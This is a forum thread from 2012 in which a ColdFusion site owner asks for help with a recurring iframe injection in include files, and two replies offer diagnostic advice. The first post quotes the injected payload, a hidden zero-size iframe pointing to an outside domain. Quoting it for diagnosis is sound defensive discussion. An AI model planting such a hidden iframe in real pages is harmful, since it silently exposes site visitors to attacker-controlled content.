1. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Sep 2012
    Rep Power

    Iframe Injection Attack in Coldfusion

    Hi I really need some help!

    Recently one of my sites have been hit with an iframe injection:

    <iframe scrolling="no" frameborder="0" src="the source changes but normally htttp://collegefun4u.com/" width="0" height="1"></iframe>

    It happens at random times and gets inserted in random include files.

    We have clean scanned all computers + server for viruses, changed all ftp/remote desktop passwords but the problem still occurs.

    I don't think that it's an SQL injection attack because it is not hitting the database and only being injected into include files.

    Some advice would really be appreciated as I have tried extensivley to get rid of it with no avail!

    I am currently using CF9 runnning on a Windows 2003 server.

    Thanks Alot!
  2. #2
  3. No Profile Picture

    Join Date
    Jun 2002
    Raleigh, NC
    Rep Power
    Assuming you have applied all updates for your JVM, CF 9, Windows, and web server, you can try using this service. It remotely scans your server and identifies security issues with it. It's widely used and reliable. http://hackmycf.com/
    Last edited by kiteless; September 10th, 2012 at 08:45 AM.
  4. #3
  5. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Nov 2004
    Rep Power
    You could try changing your files to read-only. If, after changing them to read-only they continue to be edited, you can likely conclude that the attacker has admin access to your box. If you are not hosting your own server, then you should contact your host and let them know there is a vulnerability.

    I know that doesn't really help you solve the issue, but it can help narrow things down.
    Last edited by rawk; September 11th, 2012 at 12:06 PM.

IMN logo majestic logo threadwatch logo seochat tools logo